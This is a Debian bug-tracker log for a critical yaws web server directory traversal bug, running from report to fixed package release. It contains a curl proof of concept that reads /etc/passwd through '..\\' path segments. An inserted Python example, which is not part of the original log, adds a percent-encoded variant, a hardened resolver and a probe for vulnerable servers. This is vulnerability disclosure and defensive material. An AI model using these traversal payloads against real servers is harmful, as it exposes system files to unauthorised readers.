Debian Bug report logs - #650009
yaws vulnerable to directory traversal using ..\\


Package: yaws; Maintainer for yaws is Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>; Source for yaws is src:yaws.

Reported by: Fabian Linzberger <e@lefant.net>

Date: Fri, 25 Nov 2011 15:09:05 UTC

Severity: critical

Tags: security, sid, upstream

Found in version yaws/1.91-1

Fixed in version yaws/1.91-2

Done: Sergei Golovan <sgolovan@debian.org>

Bug is archived. No further changes may be made.




Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>:
Bug#650009; Package yaws. (Fri, 25 Nov 2011 15:09:08 GMT)


Acknowledgement sent to Fabian Linzberger <e@lefant.net>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>. (Fri, 25 Nov 2011 15:09:08 GMT)


Message #5 received at submit@bugs.debian.org:

From: Fabian Linzberger <e@lefant.net>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: yaws vulnerable to directory traversal using ..\\
Date: Fri, 25 Nov 2011 16:04:43 +0100
Package: yaws
Version: 1.91-1
Severity: critical
Tags: security upstream sid

Hi,

A directory traversal vulnerability in yaws has been discovered and
disclosed at [1].

At least the version of yaws currently in sid (1.91) is affected. One
can reproduce the issue by running:

curl 'http://localhost:8080/..\\..\\..\\..\\/etc/passwd'

against a fresh install of the yaws package with default config.

This will return a copy of the /etc/passwd file. The default config
only binds yaws to the localhost IP, but the vulnerability is the same
if you run it on public addresses (as one would in many typical
installations; it is a web server).


I was not able to reproduce the issue in the version of the package in
squeeze, with the above GET request, but I have not done a thorough
investigation.


Upstream has promised a fix in the linked bug report, but there is no
official patch yet.



  Fabian


[1]: https://github.com/klacke/yaws/issues/69
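The request above works because the two halves of the server disagree about what a path separator is: a traversal filter that only recognises `/` never sees a `..` segment in `..\\..\\`, while the step that opens the file does treat `\` as a separator. The following is an added example, not code from yaws, from the reporter, or from the Debian package; it is a deliberately small Python model of that bug class, placed beside a resolver that unifies separators before any check and then verifies that the resolved path is still inside the document root. `DOCROOT`, the function names, and the percent-encoded variant of the request (`%2e%2e%5c`) are assumptions of this example, not something the report states about yaws; both resolvers are given the URL-decoded path, as a server would, so the only difference between them is separator handling and the containment check.

```python
"""Model of a '..\\' traversal bug and a hardened path resolver (added example).

Hypothetical model, not yaws's own code. DOCROOT is an assumed document root.
"""
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/yaws"  # assumed document root (hypothetical)

# Request path exactly as the report's curl command sends it (raw string, so
# each '\\' is two backslash characters on the wire).
POC_PATH = r"/..\\..\\..\\..\\/etc/passwd"

# Percent-encoded variant (constructed for this example; not from the report).
ENCODED_POC = "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd"


def vulnerable_resolve(url_path: str) -> str:
    """Traversal filter that only splits on '/', followed by a file-opening
    step that also accepts '\\' as a separator. Model of the reported bug."""
    decoded = unquote(url_path)
    if ".." in decoded.split("/"):          # never matches '..\\..' segments
        raise PermissionError("traversal rejected")
    fs_path = decoded.replace("\\", "/")    # the open step unifies separators
    return posixpath.normpath(DOCROOT + "/" + fs_path)


def hardened_resolve(url_path: str) -> str:
    """Decode, unify separators, resolve '.'/'..' and then check containment.

    Rejecting on the resolved path (not on the raw request text) closes the
    whole class: any separator or encoding trick still has to end up under
    DOCROOT after normalisation."""
    decoded = unquote(url_path)
    unified = decoded.replace("\\", "/")    # '\\' is a separator *before* any check
    candidate = posixpath.normpath(posixpath.join(DOCROOT, unified.lstrip("/")))
    if candidate != DOCROOT and not candidate.startswith(DOCROOT + "/"):
        raise PermissionError("path escapes document root: %s" % candidate)
    return candidate


def resolve_or_reject(resolver, url_path: str) -> str:
    """Convenience wrapper: the resolved filesystem path, or 'REJECTED'."""
    try:
        return resolver(url_path)
    except PermissionError:
        return "REJECTED"


def looks_like_passwd(body: bytes) -> bool:
    """Heuristic to confirm a successful traversal from the response body:
    /etc/passwd always carries root's entry with uid 0 and gid 0."""
    return b"root:x:0:0:" in body or b"root:*:0:0:" in body


def probe(fetch, path: str = POC_PATH) -> bool:
    """Run the report's check through a caller-supplied fetch(path) -> bytes.

    Returns True when the body looks like /etc/passwd, i.e. the server is
    vulnerable. fetch is injected so this stays offline and testable."""
    return looks_like_passwd(fetch(path))


if __name__ == "__main__":
    for label, resolver in (("vulnerable", vulnerable_resolve),
                            ("hardened", hardened_resolve)):
        for p in (POC_PATH, ENCODED_POC, "/../etc/passwd", "/index.yaws"):
            print("%-10s %-50s -> %s" % (label, p, resolve_or_reject(resolver, p)))
```

To use `probe` against a real server, pass a `fetch` that issues the same GET the report does (for example by shelling out to `curl -s` with the path appended to `http://localhost:8080`) and returns the raw body; a `True` result reproduces the finding, and running it against each packaged version is the quickest way to repeat the oldstable/stable/sid comparison made later in this log.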




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>:
Bug#650009; Package yaws. (Fri, 25 Nov 2011 20:39:03 GMT)


Acknowledgement sent to Sergei Golovan <sgolovan@nes.ru>:
Extra info received and forwarded to list. Copy sent to Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>. (Fri, 25 Nov 2011 20:39:03 GMT)


Message #10 received at 650009@bugs.debian.org:

From: Sergei Golovan <sgolovan@nes.ru>
To: Fabian Linzberger <e@lefant.net>, 650009@bugs.debian.org
Subject: Re: [Pkg-erlang-devel] Bug#650009: yaws vulnerable to directory traversal using ..\\
Date: Sat, 26 Nov 2011 00:36:41 +0400
On Fri, Nov 25, 2011 at 7:04 PM, Fabian Linzberger <e@lefant.net> wrote:
>
> A directory traversal vulnerability in yaws has been discovered and
> disclosed at [1].
>
> At least the version of yaws currently in sid (1.91) is affected. One
> can reproduce the issue by running:
>
> curl 'http://localhost:8080/..\\..\\..\\..\\/etc/passwd'

The bug is reproducible... So, I'll try to look into it also.

Cheers!
-- 
Sergei Golovan




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>:
Bug#650009; Package yaws. (Sat, 26 Nov 2011 10:09:03 GMT)


Acknowledgement sent to Sergei Golovan <sgolovan@nes.ru>:
Extra info received and forwarded to list. Copy sent to Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>. (Sat, 26 Nov 2011 10:09:06 GMT)


Message #15 received at 650009@bugs.debian.org:

From: Sergei Golovan <sgolovan@nes.ru>
To: Fabian Linzberger <e@lefant.net>, 650009@bugs.debian.org
Subject: Re: [Pkg-erlang-devel] Bug#650009: yaws vulnerable to directory traversal using ..\\
Date: Sat, 26 Nov 2011 14:05:41 +0400
On Sat, Nov 26, 2011 at 12:36 AM, Sergei Golovan <sgolovan@nes.ru> wrote:
> On Fri, Nov 25, 2011 at 7:04 PM, Fabian Linzberger <e@lefant.net> wrote:
>>
>> A directory traversal vulnerability in yaws has been discovered and
>> disclosed at [1].
>>
>> At least the version of yaws currently in sid (1.91) is affected. One
>> can reproduce the issue by running:
>>
>> curl 'http://localhost:8080/..\\..\\..\\..\\/etc/passwd'
>
> The bug is reproducible... So, I'll try to look into it also.

Both 1.77 (in oldstable) and 1.88 (in stable) do not recognize \\ as a
path separator, so they aren't vulnerable.

Cheers!
-- 
Sergei Golovan




Reply sent to Sergei Golovan <sgolovan@debian.org>:
You have taken responsibility. (Sat, 26 Nov 2011 16:06:03 GMT)


Notification sent to Fabian Linzberger <e@lefant.net>:
Bug acknowledged by developer. (Sat, 26 Nov 2011 16:06:03 GMT)


Message #20 received at 650009-close@bugs.debian.org:

From: Sergei Golovan <sgolovan@debian.org>
To: 650009-close@bugs.debian.org
Subject: Bug#650009: fixed in yaws 1.91-2
Date: Sat, 26 Nov 2011 16:04:26 +0000
Source: yaws
Source-Version: 1.91-2

We believe that the bug you reported is fixed in the latest version of
yaws, which is due to be installed in the Debian FTP archive:

erlang-yaws_1.91-2_i386.deb
  to main/y/yaws/erlang-yaws_1.91-2_i386.deb
yaws-chat_1.91-2_all.deb
  to main/y/yaws/yaws-chat_1.91-2_all.deb
yaws-doc_1.91-2_all.deb
  to main/y/yaws/yaws-doc_1.91-2_all.deb
yaws-mail_1.91-2_all.deb
  to main/y/yaws/yaws-mail_1.91-2_all.deb
yaws-wiki_1.91-2_all.deb
  to main/y/yaws/yaws-wiki_1.91-2_all.deb
yaws-yapp_1.91-2_all.deb
  to main/y/yaws/yaws-yapp_1.91-2_all.deb
yaws_1.91-2.diff.gz
  to main/y/yaws/yaws_1.91-2.diff.gz
yaws_1.91-2.dsc
  to main/y/yaws/yaws_1.91-2.dsc
yaws_1.91-2_all.deb
  to main/y/yaws/yaws_1.91-2_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 650009@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sergei Golovan <sgolovan@debian.org> (supplier of updated yaws package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sat, 26 Nov 2011 19:34:12 +0400
Source: yaws
Binary: yaws erlang-yaws yaws-doc yaws-chat yaws-mail yaws-wiki yaws-yapp
Architecture: source i386 all
Version: 1.91-2
Distribution: unstable
Urgency: high
Maintainer: Debian Erlang Packagers <pkg-erlang-devel@lists.alioth.debian.org>
Changed-By: Sergei Golovan <sgolovan@debian.org>
Description: 
 erlang-yaws - Erlang application which implements HTTP webserver
 yaws       - High performance HTTP 1.1 webserver written in Erlang
 yaws-chat  - Chat application for Yaws web server
 yaws-doc   - Documentation and examples for Yaws web server
 yaws-mail  - Webmail application for Yaws web server
 yaws-wiki  - Wiki application for Yaws web server
 yaws-yapp  - Provides an easy way to deploy applications for Yaws web server
Closes: 650009
Changes: 
 yaws (1.91-2) unstable; urgency=high
 .
   * Added patch by Uwe Dauernheim which fixes directory traversal bug
     (closes: #650009).
Checksums-Sha1: 
 1959a626d484ef0c8072fa00d761967da618d773 1661 yaws_1.91-2.dsc
 cd753f0e489e520097031dd3e47e060c278795a6 22269 yaws_1.91-2.diff.gz
 f6f7a24a69f880166c4689ab31aed8b5de675313 336938 erlang-yaws_1.91-2_i386.deb
 c476227621123dfac118b9c83068302545475ced 73728 yaws_1.91-2_all.deb
 3e6d308d1a05b0a686f26cf4eb8a7f06a5db6d5e 614944 yaws-doc_1.91-2_all.deb
 a3e1197bd5dac15ad887fd526a4eecc242d3e9e9 66304 yaws-chat_1.91-2_all.deb
 04f9b22925a3a4f7faf42af82177051f8c10d618 160256 yaws-mail_1.91-2_all.deb
 6823001b2d08b7ec5a81a1c6979d91a2736128fa 201894 yaws-wiki_1.91-2_all.deb
 ca1d0d1c5ef0d587c19fa46e235b9c0bf2f0265f 68846 yaws-yapp_1.91-2_all.deb
Checksums-Sha256: 
 8c2d27f6542415c71009f78cb5fc0058960a3dd2f6f6dfb848b99bf692c679f9 1661 yaws_1.91-2.dsc
 29ba8d2414b646c4712b2234a11eacb858378dcf328d7f72ceb8764e4c46f74d 22269 yaws_1.91-2.diff.gz
 9729a8ab891bf0e4ad19ba9e237033a9cf76412ce6545fdc27edfda73d7d8ff5 336938 erlang-yaws_1.91-2_i386.deb
 67f229d001cbec0c07b67767b00f50f3805b2b2207dfb04d49807d283ceaa275 73728 yaws_1.91-2_all.deb
 683bc64ec3a05ff358454b074ec6dd290ac49a372b57331ee4fb8bd70837bb5c 614944 yaws-doc_1.91-2_all.deb
 b46b1b24c162e1b859ed8c0fb1995f8fcec9aa11064e06d83b9babe9c7824ef0 66304 yaws-chat_1.91-2_all.deb
 8ff1832d3fa82cdec4aa477c0d1f51a06254257cc281e6b9798d7eb12dcce671 160256 yaws-mail_1.91-2_all.deb
 96c162bd5edd9218d411fff9a9022a1b0fffc5d861c61bb4747e1251be989293 201894 yaws-wiki_1.91-2_all.deb
 02741c2f692d90e062851e0be8cac2088aeb8dfcaa5c822c4b154cf9e2e6ca64 68846 yaws-yapp_1.91-2_all.deb
Files: 
 11822fba157c3ad5134fc7c70da3933e 1661 httpd optional yaws_1.91-2.dsc
 42b3a182fa4b25e93a88c444882af741 22269 httpd optional yaws_1.91-2.diff.gz
 198693b6455f6837cdad8b10d3561d93 336938 httpd optional erlang-yaws_1.91-2_i386.deb
 27970515d4fbae9a610b946c85f36d55 73728 httpd optional yaws_1.91-2_all.deb
 62366b228608b717c180d50d41294134 614944 doc optional yaws-doc_1.91-2_all.deb
 cad1430673d85b880d5ec7e1fb5f9c11 66304 web optional yaws-chat_1.91-2_all.deb
 c3e20e5f591c5e1871e961fac8f9f18f 160256 web optional yaws-mail_1.91-2_all.deb
 b08adc2dc9581fc66efbe1ee5d57ca9f 201894 web optional yaws-wiki_1.91-2_all.deb
 d6fdc4139460d680187de42f44b50bcd 68846 web optional yaws-yapp_1.91-2_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iD8DBQFO0QuvIcdH02pGEFIRAmyRAKCPEjsBC2d7LPqnKC3j01QMrbdT4QCaAk6E
9N0+BZHTJe6wBGVxnWC80bU=
=a7/W
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 27 Dec 2011 07:33:02 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Aug 2 03:29:43 2024; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.